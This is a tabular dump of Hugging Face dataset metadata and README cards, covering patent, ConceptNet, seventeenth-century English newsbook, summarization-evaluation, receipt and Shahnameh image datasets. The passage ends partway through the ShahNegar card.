author
stringlengths
2
29
cardData
null
citation
stringlengths
0
9.58k
description
stringlengths
0
5.93k
disabled
bool
1 class
downloads
float64
1
1M
gated
bool
2 classes
id
stringlengths
2
108
lastModified
stringlengths
24
24
paperswithcode_id
stringlengths
2
45
private
bool
2 classes
sha
stringlengths
40
40
siblings
list
tags
list
readme_url
stringlengths
57
163
readme
stringlengths
0
977k
ufukhaman
null
null
null
false
1
false
ufukhaman/uspto_balanced_filtered_20k_ipc_patents
2022-07-19T18:41:55.000Z
null
false
963b836b3d7fd47cbd26d81f1fee35cd21ec1ddb
[]
[ "annotations_creators:USPTO", "language:English", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:original", "tags:patent", "tags:refined_patents", "tags:patent classification", "tags:uspto", "tags:ipc", "task_categories:text-classification", "tas...
https://huggingface.co/datasets/ufukhaman/uspto_balanced_filtered_20k_ipc_patents/resolve/main/README.md
--- annotations_creators: - USPTO language: - English license: - mit multilinguality: - monolingual pretty_name: uspto_balanced_filtered_200k_ipc_patents size_categories: - 10K<n<100K source_datasets: - original tags: - patent - refined_patents - patent classification - uspto - ipc task_categories: - text-classification task_ids: - topic-classification ---
relbert
null
@inproceedings{li-16, title = {Commonsense Knowledge Base Completion}, author = {Xiang Li and Aynaz Taheri and Lifu Tu and Kevin Gimpel}, booktitle = {Proc. of ACL}, year = {2016} } @InProceedings{P16-1137, author = "Li, Xiang and Taheri, Aynaz and Tu, Lifu and Gimpel, Kevin", title = "Commonsense Knowledge Base Completion", booktitle = "Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers) ", year = "2016", publisher = "Association for Computational Linguistics", pages = "1445--1455", location = "Berlin, Germany", doi = "10.18653/v1/P16-1137", url = "http://aclweb.org/anthology/P16-1137" }
[ConceptNet with high confidence](https://home.ttic.edu/~kgimpel/commonsense.html)
false
1
false
relbert/conceptnet_high_confidence
2022-09-20T01:13:24.000Z
null
false
7a73e5c5d9569f29a92fc65be56c3908ec280419
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:1K<n<10K" ]
https://huggingface.co/datasets/relbert/conceptnet_high_confidence/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - 1K<n<10K pretty_name: ConceptNet with High Confidence --- # Dataset Card for "relbert/conceptnet_high_confidence" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://home.ttic.edu/~kgimpel/commonsense.html](https://home.ttic.edu/~kgimpel/commonsense.html) - **Dataset:** High Confidence Subset of ConceptNet ### Dataset Summary The selected subset of ConceptNet used in [this work](https://home.ttic.edu/~kgimpel/commonsense.html), which compiled to fine-tune [RelBERT](https://github.com/asahi417/relbert) model. ## Dataset Structure ### Data Instances An example of `train` looks as follows. ``` { "relation_type": "AtLocation", "positives": [["fish", "water"], ["cloud", "sky"], ["child", "school"], ... ], "negatives": [["pen", "write"], ["sex", "fun"], ["soccer", "sport"], ["fish", "school"], ... ] } ``` ### Data Splits | name |train|validation| |---------|----:|---------:| |conceptnet_high_confidence| 25 | 24| ### Number of Positive/Negative Word-pairs in each Split | relation_type | positive (train) | negative (train) | positive (validation) | negative (validation) | |:-----------------|-------------------:|-------------------:|------------------------:|------------------------:| | AtLocation | 383 | 1768 | 97 | 578 | | CapableOf | 195 | 1790 | 73 | 600 | | Causes | 71 | 1797 | 26 | 595 | | CausesDesire | 9 | 1793 | 11 | 595 | | CreatedBy | 2 | 1796 | 0 | 0 | | DefinedAs | 0 | 0 | 2 | 595 | | Desires | 16 | 1794 | 12 | 595 | | HasA | 67 | 1814 | 17 | 595 | | HasFirstSubevent | 2 | 1796 | 0 | 0 | | HasLastSubevent | 2 | 1796 | 3 | 593 | | HasPrerequisite | 168 | 1803 | 57 | 592 | | HasProperty | 94 | 1801 | 39 | 605 | | HasSubevent | 125 | 1798 | 40 | 609 | | IsA | 310 | 1764 | 98 | 603 | | MadeOf | 17 | 1793 | 7 | 593 | | MotivatedByGoal | 14 | 1796 | 11 | 595 | | NotCapableOf | 15 | 1793 | 0 | 0 | | NotDesires | 4 | 1795 | 4 | 592 | | PartOf | 34 | 1801 | 7 | 593 | | ReceivesAction | 18 | 1793 | 8 | 593 | | SymbolOf | 0 | 0 | 2 | 596 | | UsedFor | 249 | 1815 | 81 | 588 | | SUM | 1795 | 35896 | 595 | 11305 | ### Citation Information ``` @InProceedings{P16-1137, author = "Li, Xiang and Taheri, Aynaz and Tu, Lifu and Gimpel, Kevin", title = "Commonsense Knowledge Base Completion", booktitle = "Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers) ", year = "2016", publisher = "Association for Computational Linguistics", pages = "1445--1455", location = "Berlin, Germany", doi = "10.18653/v1/P16-1137", url = "http://aclweb.org/anthology/P16-1137" } ```
relbert
null
@inproceedings{speer2017conceptnet, title={Conceptnet 5.5: An open multilingual graph of general knowledge}, author={Speer, Robyn and Chin, Joshua and Havasi, Catherine}, booktitle={Thirty-first AAAI conference on artificial intelligence}, year={2017} }
[ConceptNet5](https://ojs.aaai.org/index.php/AAAI/article/view/11164)
false
2
false
relbert/conceptnet
2022-07-26T10:24:35.000Z
null
false
41b8a9a3b3f7aab40340b983c8fd852240cf5fc5
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:1K<n<10K" ]
https://huggingface.co/datasets/relbert/conceptnet/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - 1K<n<10K pretty_name: ConceptNet --- # Dataset Card for "relbert/conceptnet" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://ojs.aaai.org/index.php/AAAI/article/view/11164](https://ojs.aaai.org/index.php/AAAI/article/view/11164) - **Dataset:** ConceptNet5 ### Dataset Summary ConceptNet5, which compiled to fine-tune [RelBERT](https://github.com/asahi417/relbert) model. ## Dataset Structure ### Data Instances An example of `train` looks as follows. ``` { "relation_type": "AtLocation", "positives": [["fish", "water"], ["cloud", "sky"], ["child", "school"], ... ], "negatives": [["pen", "write"], ["sex", "fun"], ["soccer", "sport"], ["fish", "school"], ... ] } ``` ### Data Splits | name |train|validation| |---------|----:|---------:| |conceptnet| 33 | 25| ### Number of Positive/Negative Word-pairs in each Split | relation_type | positive (train) | negative (train) | positive (validation) | negative (validation) | |:-----------------|-------------------:|-------------------:|------------------------:|------------------------:| | Antonym | 3175 | 206870 | 703 | 65330 | | AtLocation | 6974 | 203071 | 727 | 65306 | | CapableOf | 603 | 209442 | 0 | 0 | | Causes | 906 | 209139 | 83 | 65950 | | CausesDesire | 195 | 209850 | 30 | 66003 | | CreatedBy | 104 | 209941 | 4 | 66029 | | DefinedAs | 16 | 210029 | 2 | 66031 | | Desires | 374 | 209671 | 0 | 0 | | DistinctFrom | 1552 | 208493 | 426 | 65607 | | Entails | 277 | 209768 | 118 | 65915 | | HasA | 606 | 209439 | 10 | 66023 | | HasContext | 4664 | 205381 | 1936 | 64097 | | HasFirstSubevent | 66 | 209979 | 17 | 66016 | | HasLastSubevent | 82 | 209963 | 14 | 66019 | | HasPrerequisite | 586 | 209459 | 123 | 65910 | | HasProperty | 1397 | 208648 | 0 | 0 | | HasSubevent | 644 | 209401 | 64 | 65969 | | InstanceOf | 1 | 210044 | 0 | 0 | | IsA | 54028 | 156017 | 21122 | 44911 | | LocatedNear | 21 | 210024 | 3 | 66030 | | MadeOf | 221 | 209824 | 23 | 66010 | | MannerOf | 8762 | 201283 | 3747 | 62286 | | MotivatedByGoal | 282 | 209763 | 35 | 65998 | | NotCapableOf | 17 | 210028 | 0 | 0 | | NotDesires | 235 | 209810 | 0 | 0 | | NotHasProperty | 74 | 209971 | 19 | 66014 | | PartOf | 6880 | 203165 | 2629 | 63404 | | ReceivesAction | 290 | 209755 | 0 | 0 | | RelatedTo | 61672 | 148373 | 11356 | 54677 | | SimilarTo | 82 | 209963 | 36 | 65997 | | SymbolOf | 1 | 210044 | 0 | 0 | | Synonym | 52261 | 157784 | 22391 | 43642 | | UsedFor | 2997 | 207048 | 415 | 65618 | | SUM | 210045 | 6.72144e+06 | 66033 | 1.58479e+06 | ### Citation Information ``` @inproceedings{speer2017conceptnet, title={Conceptnet 5.5: An open multilingual graph of general knowledge}, author={Speer, Robyn and Chin, Joshua and Havasi, Catherine}, booktitle={Thirty-first AAAI conference on artificial intelligence}, year={2017} } ```
biglam
null
@misc{20.500.12024/2531, title = {The Lancaster Newsbooks Corpus}, author = {Thomason, George, d. 1666}, url = {http://hdl.handle.net/20.500.12024/2531}, note = {Oxford Text Archive}, copyright = {Distributed by the University of Oxford under a Creative Commons Attribution-{NonCommercial}-{ShareAlike} 3.0 Unported License.}, year = {2005} }
This corpus consists of two collections of seventeenth-century English "newsbooks". Both were drawn from the Thomason Tracts collection, which is held at the British Library and available in graphical form via Early English Books Online (EEBO). The construction of these keyboarded versions were in both cases funded by the British Academy. The FIRST collection (1654_newsbooks) consists of every newsbook published in London and still surviving in the Thomason Tracts from the first half of 1654 (to be precise, for the second half of December 1653 to the end of May 1654, with one or two additions from the first week in June, 1654). This was constructed for the project "Looking at text re-use in a corpus of seventeenth-century news reportage", funded by the British Academy, grant reference SG-33825. The SECOND collection (mercurius_fumigosus) consists of every surviving issue published of the highly idiosyncratic newsbook "Mercurius Fumigosus", written by John Crouch between summer 1654 and early autumn 1655. This was constructed for the project "Decoding the news - Mercurius Fumigosus as a source of news in the interregnum, 1654-1655", funded by the British Academy, grant reference LRG-35423. This is version 1.0 of the corpus, released April 2007; it supercedes earlier versions circulated informally. For more information about the corpus, see www.ling.lancs.ac.uk/newsbooks
false
1
false
biglam/lancaster_newsbooks
2022-08-18T16:03:54.000Z
null
false
c5cd49c2881afa3525bbf9298f503934f3805f5c
[]
[ "annotations_creators:no-annotation", "language:en", "language_creators:expert-generated", "license:cc-by-sa-3.0", "multilinguality:monolingual", "size_categories:n<1K", "source_datasets:original", "tags:newsbooks", "tags:1654", "tags:lancaster", "tags:oxford text" ]
https://huggingface.co/datasets/biglam/lancaster_newsbooks/resolve/main/README.md
--- annotations_creators: - no-annotation paperswithcode_id: null language: - en language_creators: - expert-generated license: - cc-by-sa-3.0 multilinguality: - monolingual pretty_name: Lancaster Newsbooks size_categories: - n<1K source_datasets: - original tags: - newsbooks - '1654' - lancaster - oxford text task_categories: [] task_ids: [] --- # Dataset Card for lancaster_newsbooks ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** https://ota.bodleian.ox.ac.uk/repository/xmlui/handle/20.500.12024/2531 - **Repository:** [Needs More Information] - **Paper:** [Needs More Information] - **Leaderboard:** [Needs More Information] - **Point of Contact:** Tony McEnery ### Dataset Summary This corpus consists of two collections of seventeenth-century English "newsbooks". Both were drawn from the Thomason Tracts collection, which is held at the British Library and available in graphical form via Early English Books Online (EEBO). The construction of these keyboarded versions were in both cases funded by the British Academy. The FIRST collection (1654_newsbooks) consists of every newsbook published in London and still surviving in the Thomason Tracts from the first half of 1654 (to be precise, for the second half of December 1653 to the end of May 1654, with one or two additions from the first week in June, 1654). This was constructed for the project "Looking at text re-use in a corpus of seventeenth-century news reportage", funded by the British Academy, grant reference SG-33825. The SECOND collection (mercurius_fumigosus) consists of every surviving issue published of the highly idiosyncratic newsbook "Mercurius Fumigosus", written by John Crouch between summer 1654 and early autumn 1655. This was constructed for the project "Decoding the news - Mercurius Fumigosus as a source of news in the interregnum, 1654-1655", funded by the British Academy, grant reference LRG-35423. This is version 1.0 of the corpus, released April 2007; it supercedes earlier versions circulated informally. For more information about the corpus, see www.ling.lancs.ac.uk/newsbooks ### Supported Tasks and Leaderboards `text-classification`: This dataset can be used to augent existing datasets to find stylistic differences between texts from different time periods ### Languages The language in this dataset is English from 1654. The associated BCP-47 code is `en:GB` ## Dataset Structure ### Data Instances ``` { 'id': 'PerfAcc170', 'text': "Another late fight in Scotland, betwixt Col. Morgan and the Highlanders; with the number that were slain and taken Prisoners. The removing of Lieut. Col. John Lilburn from the Tower of London. The readiness of our Fleet for new action, though Peace be agreed on with Holland and Denmark. The taking of several more Prizes at sea. An Order of the Commissioners for the Trial and Approbation of public Preachers. Several proceedings of His Highness the Lord Protector and his Council, and another Ordinance touching the adjourning of the Term. Together with variety of choice Intelligence from several Foreign parts. From Wednesday APRIL 5 TO Wednesday April 12. 1654. Many Addresses were made to his Highness the Lord Protector, in the name of the City and County of York, and other places, wherein they acknowledge the great blessing of God to this Nation, that they have so great, so good and able a Protector. This day the Sessions began in the Old Bailey, and one of those that committed the late Robbery on Black-Heath, being called to his Trial, he refused to plead; but more hereafter. This evening about 9 of the Clock, the Dutch Ambassadors signed and sealed the Ratification of the Articles of Peace so long spoken of; so did likewise the Commissioners appointed to treat with them by his Highness the Lord Protector. Paris April 11, 1654. The Cardinal de Retz being removed from Vincennes by the Marshal de la Mesteray, is now safe arrived at Nantes, and put into the Castle. The Court Emissaries give out that he is not to be long there, but in a few days to be set at liberty, only that his Majesty desireth satisfaction upon some certain points, although the main drift is to make him surrender his place of Archbishop of this City. The Commissioners of Languedoc cannot yet prevail in anything upon their Complaints, but are like the Commissioners of Catalonia, who hitherto have prevailed no further than to receive many fair words, but nothing effectual, the main work now in hand, is to find monies speedily for the setting forth of the Army, that they may be in the field as soon as may be, and to that end the Partisans are not wanting to find out new ways for exacting of monies, preferring large sums to be put into the King's Coffers, the difficulty lieth only in the effecting of it, by reason that the Country is in most places so exhausted of monies, that they are scarce able to live: The design for the King's Coronation is now on foot again, and if I am rightly informed, it will be done about the middle of May next, which being done, his Majesty shall go upon the borders and down to Picardy to forward his Army in their Action, so much the rather, by reason that the Prince of Conde, whom we hear was last week at Valenciennes, and then taking a view of his Army, is returned to Bruxels, there to confer with the Archduke Leopoldus for to obtain money and other necessaries for the march of his Army, that so they may fall to action as soon as the weather and season will give them leave, his Lady and son are still at Rocroy, where they are expecting some alteration to their present condition. The Earl of Harcourt hath not yet received any answer from the Court upon those proposals which he lately sent to the Court. We have news, that the Duke Francis hath at last accepted the command of his Brother the Duke of Lorrain's Army, and is expected there in a few days, which our Cardinal doth very well relish. The forces that were in the Country of Liege are now marching homewards, and are to be quartered in Lorrain. The great preparation for an Armado to go from Marseilles and Touloon, is much at a stand, only there are lately 5 men of War gone to Sea, and 3 more are to follow, but upon no design than to rob and plunder upon the sea, sparing scarce any they encounter, whether they be friends or foes. This day his Highness the Lord Protector and his Council, passed an Ordinance for adjourning of Easter Term, from and after the first Return thereof, called Quindena Pasch, until the first Return of Trinity Term, called Crastino Trinatatis. Dalkieth, April 3. Cap. Sherwin Commander of the Primrose, and Cap. Smith Commander of the Duchess, in their return from Orkney, took a Dutch vessel laden with French and Spanish Wines, linen Cloth, and other good commodities, bound for the West Indies; they sent her into Aberdeen. Some young Lairds and others purposing to glean a party of horse in Lothian, and repair to the enemy, are taken, and brought hither prisoners. Aberdeen, April 1. The Earl of Athol is come to Glencarn with about 700 horse and foot, Seaford and some new raised forces are daily expected to join with them. Glencarn with his whole force, consisting of 2000 horse and foot, is at Dingwel, two miles from Brahan, not undeserving the name of an Island, so that we hope to engage them there. In order whereunto Lieut. Col. Mitchell is marched towards Inverness with 9 companies of Foot, and Col. Morgan hath followed him with 5 troops of Col Rich his Regiment, and 4 troops of Dragoons; he intends to take Col. Tomlinson's Regiment, which is in his way, and to draw 5 companies of Foot out of Inverness. From Cows in the Isle of Wight, April 6. A private man of War hath, about two days since, taken and brought in hither two French vessels, one of which is laden with Salt, the other hath but little except ballast; Our Fleet is for the most part near St. Helens point and the rest as the Spits head, being in all near 100 sail, gallant ships, and bravely accommodated. One of our Frigates hath taken a Holland ship, and carried her to Portsmouth; she hath in her 8 Bales of Paper, and some small quantity of Indico. Many ships that were here, went away yesterday morning towards the Downs; and several Merchants' ships are at present here in this road, being detained by contrary winds; they expect some favourable Easterly gales, that so they may proceed on their intended voyages. Deal, April 7. A man of War of ours is this morning gone for Holland, to get the Ratification of the Peace made with them, and an Express from the Dutch Ambassador, touching the Agreement. Most part of the ships which remained in this Road, are gone up into the River of Thames; here is only some few left that are bound to the Southward. A Fleet consisting of about 40 or 50 sail of ships, great and small, passed by this place, which we suppose to be the Dunkirk fleet bound for London. Because many will not give credit to the Agreement of Peace between the Commonwealths of England and Holland, (though their Unbelief proceeds from several causes, some prejudicately fearing the worst, and others wishing and desiring rather than the Fountain of Blood may still be open) We can, and do assure you, That the Articles (as we said before) were signed and sealed by the Commissioners on both sides, on Wednesday night last, and within 14 days are to be signed and sealed by the Lord Protector, and the States of Holland, and then to publicly proclaimed and published, both in England and Holland in one day. The Agreement with Denmark is also taken in upon the Articles: And for satisfaction of the loss which our English Merchants sustained by that King's command, whose demands amount to about 150000l. it is referred to four Merchants, two whereof to be English, and the other two Dutch; which four Merchants shall have absolute power to determine those demands within the space of twenty days; the place where they are to sit, is Guildhall. As touching the business of Amboyna, it is referred to eight Commissioners, who have six months time to agree thereon, and in case they agree not, then Umpires are nominated to determine that business. Let those that delight themselves in blood, have blood to drink, for they are worthy. From Legorn, March 23. thus. This week in the sight of this City was a sore fight between two ships at Sea, the one Dutchman of War of 32 guns, and the other an English ship called the Expedition, who came from Zant with Currans; the fight lasted 6 hours, but night having parted them, both ships sunk; most of the men were saved, but nothing else, though the fight was near the shore. It is advertised from Cullen, That the Treaty between that Elector and the Spanish Commissioners, is brought to perfection, and signed, which is, That both French and Spanish shall have free passage through the Country of Liege, not committing any acts of hostility upon each other; and the Spaniards in point of satisfaction for the losses received from them and the Lorrainers, shall pay to the said Elector 200000 Rixdollars out of the Duke of Lorrain's estate, and for security of performance, the Lordship of Kerpen, and another in Gulick shall be put into his hands until full payment. From Poland thus. The General of the Cossacks hath delivered up three very considerable places to the Muscovite, and caused himself to be re baptized after the Muscovia manner, which is so ill resented by all sorts of people in that Country, that the Commanders sent to the King of Poland, That if he pleased to send them a general pardon for what they had done, and the rest of the Army, they will return with the major part of the Army into his Majesty's service; which hath so incensed the General, that having caused them to be apprehended he hath made each of them shorter by the head, which hath caused much heart burning among the people. Whereas many abuses and corruptions are crept into the ordinary course and administration of Justice, both in Law and Equity, the reformation whereof hath not yet been attained; Out of a tender care and desire that so necessary and good a work may at length be brought to effect, it is held convenient that so necessary and good a work may at length be brought to effect, it is held convenient that so necessary and good a work may at length be brought to effect, it is held convenient and necessary to adjourn part of the next Term of Easter; be if therefore Ordained by his Highness the Lord Protector, by and with the consent of his Council, That part of the said Term of Easter now next coming be adjourned, that is to say, from and after the first Return, called Quindena Pasch, unto the last Return of the said Easter Term, called Crastino Ascensionis; And all and every person or persons, which have cause, or commandment to appear in any of the Courts at Westminster, in or at any day or time, from and after the said Return, called Quindena Pasch, may tarry at their dwellings, or where their business shall lie, without resorting to any of the said Courts for that Cause, until the said last Return, called Crastino Ascensionis, without danger or forfeiture, penalty or contempt to be in that behalf. And be it also ordained by the Authority aforesaid, That Writs of Adjournment shall be directed to the Justices of the said Courts, and Barons of the Exchequer, giving them authority to adjourn the said part of the said Term of Easter, as aforesaid, that is to say, from and after the said first Return called Quindena Pasch, until the said last Return of the said Term, called Crastino Ascensionis, as before is said, and the said adjournment shall be made, as aforesaid. And be it further Ordained, That all Matters, Causes and Suits, depending in any of the said Courts, shall have continuance, and the parties shall have day, from the day of the said Adjournment, until the said Return of Crastino Ascensionis, as is aforesaid; and the Lord's Commissioners of the Great Seal are required to issue forth Writs accordingly. And be it further Ordained, That a former Ordinance of the sixth day of this instant April, for the Adjourning of part of the said Term, until the first Return of Trinity Term next, called Crastino Trinitatis, be from henceforth Repealed and void. And it is lastly Ordained by the Authority aforesaid, That the Sheriffs of London and Middlesex, and all other Sheriffs both in England and Wales, do forthwith proclaim and publish this Ordinance in the chief Market Towns and usual places within their several and respective Counties. Lieutenant Colonel John Lilburn being said to have again attempted something against the State, is removed from the Tower to be prisoner in some more remote place. The titular King of Scots is still at Paris, and of late something more merry than ordinary. The Deputies for Languedoc telling him, that if there were a Peace concluded with England, it would be well for all the Protestants in France; He made answer that he was glad of it, for it would then be the better for himself. This day was the Gaol delivery; three were hanged, one whereof died most desperately, and going up the Cart, drank a health to the Devil's Majesty: One was pressed last Saturday, and being afterwards heard to groan, was carried down to the Press-yard again to have the execution dispatched. The Commissioners for Approbation of public Ministers, sate at Whitehall, and divers Certificates were presented unto them in behalf of several particular persons, for approbation; and in regard that none hereafter should out of carelessness of partiality set their hands to a Certificate for any person that hereafter should out of carelessness or partiality let their hands to a Certificate for any person that hereafter may be found unworthy to be admitted, and so become prejudicial to the Church of Christ, and frustrate the intentions of our Governors which made this Ordinance; the said Commissioners do earnestly beseech all whom it may concern (in the bowels of Christ) as they tender the honour of the great God himself, whose servants we all are, the prejudice of the souls of his people purchased by the blood of his Son, the advancement and propagation of his Gospel, through all the parts of this Land and Nation, whereunto we belong, so to lend assistance both of their fervent prayers, and due informations, that thereby the work may be carried on more prosperously, and the Commissioners more encouraged to attend it. Signed in the name, and at the request of the Commissioners for Approbation of public Preachers. By Francis Rouse, Io. Arrowsmith. William Goss. Stephen Marshall. The last Letters from Edinburgh speak of another Engagement betwixt Col. Morgan, and the Enemy; but they tell us not the particulars, only they say, that the Enemy is once more dispersed, and driven further up into the mountains, with the loss of about 200 men. The peace with Holland being concluded (as you heard before) our Merchants are lading of goods on shipboard, as fast as Lighters can be gotten to carry them where the ships ride at anchor. We likewise hear of the like preparations in Holland for transporting of goods of several sorts hither. And now all the rest of Europe are at a stand, or at leastwise stand gazing upon us, and begin to cast about with themselves, what action may be great and considerable enough for to be undertaken next by those great Fleets, which are as ready for action as any opportunity can be to offer itself. How they will be disposed of Time will discover. London, Printed by E. Alsop 1654.", 'title': 'A Perfect Account, Issue 170'} ``` ### Data Fields ``` { "id": Unique identifier for that data point("string"), "text": Text in that datapoint("string"), "title": The title of the news article("string") } ``` ### Data Splits Train: 303 ## Dataset Creation ### Curation Rationale The FIRST collection (1654_newsbooks) consists of every newsbook published in London and still surviving in the Thomason Tracts from the first half of 1654 (to be precise, for the second half of December 1653 to the end of May 1654, with one or two additions from the first week in June, 1654) and was constructed for the project "Looking at text re-use in a corpus of seventeenth-century news reportage", funded by the British Academy, grant reference SG-33825. The SECOND collection (mercurius_fumigosus) consists of every surviving issue published of the highly idiosyncratic newsbook "Mercurius Fumigosus", written by John Crouch between summer 1654 and early autumn 1655. This was constructed for the project "Decoding the news - Mercurius Fumigosus as a source of news in the interregnum, 1654-1655", funded by the British Academy, grant reference LRG-35423. ### Source Data #### Initial Data Collection and Normalization This corpus was created by the Department of Linguistics and English Language, Lancaster University. #### Who are the source language producers? The original data was humna-generated from existing newsbooks ### Annotations #### Annotation process [N/A] #### Who are the annotators? [N/A] ### Personal and Sensitive Information None, since this dataset is from 1654 ## Considerations for Using the Data ### Social Impact of Dataset This dataset provides an insight into the news and social systems from 17th century England ### Discussion of Biases The dataset is from the 17th century and some articles might reflect social biases of the time in terms of sexuality, gender, race, etc. ### Other Known Limitations [N/A] ## Additional Information ### Dataset Curators This corpus was created by the Department of Linguistics and English Language, Lancaster University. Project leader: Tony McEnery Corpus editor: Andrew Hardie ### Licensing Information Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License ### Citation Information @misc{20.500.12024/2531, title = {The Lancaster Newsbooks Corpus}, author = {Thomason, George, d. 1666}, url = {http://hdl.handle.net/20.500.12024/2531}, note = {Oxford Text Archive}, copyright = {Distributed by the University of Oxford under a Creative Commons Attribution-{NonCommercial}-{ShareAlike} 3.0 Unported License.}, year = {2005} }
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-samsum-7328461a-11225503
2022-07-19T22:01:15.000Z
null
false
6c18754cc3af5656edef386b34f37ef496788a33
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:samsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-samsum-7328461a-11225503/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - samsum eval_info: task: summarization model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 metrics: ['perplexity'] dataset_name: samsum dataset_config: samsum dataset_split: test col_mapping: text: dialogue target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 * Dataset: samsum * Config: samsum * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cnn_dailymail-73f27c66-11235504
2022-07-21T05:32:04.000Z
null
false
97d2dd14602e380348a4f29f4441e70a01858e1f
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cnn_dailymail" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cnn_dailymail-73f27c66-11235504/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cnn_dailymail eval_info: task: summarization model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 metrics: ['perplexity'] dataset_name: cnn_dailymail dataset_config: 3.0.0 dataset_split: test col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 * Dataset: cnn_dailymail * Config: 3.0.0 * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model.
naver-clova-ix
null
null
null
false
2,415
false
naver-clova-ix/cord-v2
2022-07-19T23:43:33.000Z
null
false
7f0115a4b758a71d6473b8d085751692da2fef98
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/naver-clova-ix/cord-v2/resolve/main/README.md
--- license: cc-by-4.0 ---
miyoung
null
null
null
false
1
false
miyoung/datasetTest
2022-07-20T01:42:35.000Z
null
false
672de36dac4dff8857b5b4f07443f721d0cada1a
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/miyoung/datasetTest/resolve/main/README.md
--- license: afl-3.0 ---
Willaim
null
null
null
false
2
false
Willaim/H
2022-07-20T02:50:07.000Z
null
false
961402a28a0c436af83eab460132148053441208
[]
[]
https://huggingface.co/datasets/Willaim/H/resolve/main/README.md
from transformers import AutoTokenizer, AutoModel tokenizer = AutoTokenizer.from_pretrained("bigscience/bloom") model = AutoModel.from_pretrained("bigscience/bloom")
sadrasabouri
null
null
null
false
8
false
sadrasabouri/ShahNegar
2022-10-21T11:54:05.000Z
null
false
8acfecc725b172d1283aa50f67521ddc08b3c682
[]
[ "annotations_creators:machine-generated", "language_creators:expert-generated", "language:en", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:original", "task_categories:image-to-text", "task_categories:text-to-image", "task_ids:image-captioning" ]
https://huggingface.co/datasets/sadrasabouri/ShahNegar/resolve/main/README.md
--- annotations_creators: - machine-generated language_creators: - expert-generated language: - en license: - mit multilinguality: - monolingual size_categories: - 10K<n<100K source_datasets: - original task_categories: - image-to-text - text-to-image task_ids: - image-captioning pretty_name: ShahNegar --- # ShahNegar (A Plotted version of The Shahnameh) This dataset is a plotted version of Ferdowsi's Shahnameh (which is a highly-regarded ancient set of Farsi poems) generated using DALL-E mini (aka [craiyon](https://www.craiyon.com/)). You can use this dataset using the code below: ```python from datasets import load_dataset dataset = load_dataset("sadrasabouri/ShahNegar") ``` ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Paper:** - **Point of Contact:** [Sadra Sabouri](mailto:sabouri.sadra@gmail.com) ### Dataset Summary This dataset contains more than 30K images with their corresponding text from the Shahnameh. For each Shahnameh paragraph, we generated at most 9 images. Images corresponding to the same paragraphs have the same `id` field. There was a human annotation post-process in which we removed some harmful/private generated images from the dataset. After all we reached to more than 30K, 256 * 256 images. ### Supported Tasks and Leaderboards The main purpose of making this dataset open source is because of its artistic value, but it can also be used for the below tasks: + text-to-image + image-to-text (image captioning) ### Languages The Shahnameh was generally written in Farsi (Persian) but the translated version we used for this dataset - 